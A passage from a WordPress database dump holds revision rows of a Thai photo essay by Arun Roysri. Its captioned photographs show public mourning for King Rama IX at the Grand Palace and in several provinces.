/>หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:25:25', '2018-11-12 07:25:25', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4388, 3, '2018-11-12 14:27:40', '2018-11-12 07:27:40', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"wp-image-4317 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:27:40', '2018-11-12 07:27:40', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4389, 3, '2018-11-12 14:29:47', '2018-11-12 07:29:47', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p style=\"text-align: center;\"><img class=\"wp-image-4316 size-large aligncenter\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"wp-image-4317 size-large alignright\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" />ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ 